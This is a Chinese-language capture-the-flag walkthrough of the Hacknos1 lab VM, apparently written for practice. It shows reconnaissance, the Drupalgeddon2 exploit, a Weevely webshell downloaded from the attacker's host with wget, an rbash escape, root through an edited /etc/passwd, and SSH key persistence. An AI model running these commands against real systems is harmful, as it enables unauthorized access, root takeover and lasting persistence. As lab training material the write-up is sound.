Hacknos1

目标靶机ip：192.168.9.42

扫描目标靶机 开放端口信息等详细信息

Nmap –A 192.168.9.42

开放22端口 ssh协议  可以进行**

开放80端口

访问目标靶机web服务 http://192.168.9.42/ 未获得有用信息

访问目标靶机 robots.txt ，不存在robots.txt

http://192.168.9.42/robots.txt

使用dirb 对目标靶机web目录进行扫描，挨个页面查找有用信息

Dirb http://192.168.9.42/

发现目标靶机用的cms是drupal。

whatweb http://192.168.9.42/drupal/ 得知drupal版本为7

 

从目标目录中http://192.168.9.42/drupal/profiles/minimal/minimal.info  得知drupal版本为7.57

搜索 drupal 7 exploit github 寻找漏洞的shellcode

 

使用git clone https://github.com/dreadlocked/Drupalgeddon2.git将漏洞利用文件下载到本地

阅读readme.txt查看使用方法

./drupalgeddon2.rb http://192.168.9.42/drupal使用漏洞 得到一个shell

 

查看自身可以使用的命令   whoami  / cd /  su  /su  / wget / ls 等等，发现权限太小目录都无法切换。

 

提权

Weevely 生成小马

Weevely generate eses  es.php

 

启动web服务 通过 shell  将小马上传到目标靶机

Python2 –m SimpleHTTPServer 8080或者

Python3 –m http.server 8080

Wget http://192.168.9.69:8080/es.php

Weevely 连接小马

Weevely http://192.168.9.42/drupal/es.php eses

浏览目录下的有用信息

alexander.txt

发现是使用base64加密的  从百度进行解密

发现时使用brianfuck加密 从百度解密

发现疑似用户名和密码 切换用户试试

 

发现权限不够

继续提权 使用msf 绕过rbash

Python3 –c ‘import pty;pty.spawn(“/bin/bash”)’

切换用户试试

失败尝试其他方法 ，发现可以看到/etc/passwd

用passwd提权，将passwd下载到本地添加用户file_download passwd /root/Desktop/passwd

使用openssl对密码进行md5加密openssl passwd –salt salt eses

在passwd最后一行加入用户es密码eses

用修改完的passwd覆盖目标靶机上的passwd

发现我们的用户已经添加进去

Su切换用户看看 已经拿到root权限

 

接下来就是权限维持,试试ssh登录，被禁止。

 

设置ssh免密登录 本地执行ssh-******;

目标靶机执行ssh-******;

 

 

将本地的id_rsa.pub中的内容 放在目标靶机.ssh下新建的authorized_keys文件里 实现免密登录

Ssh登陆试试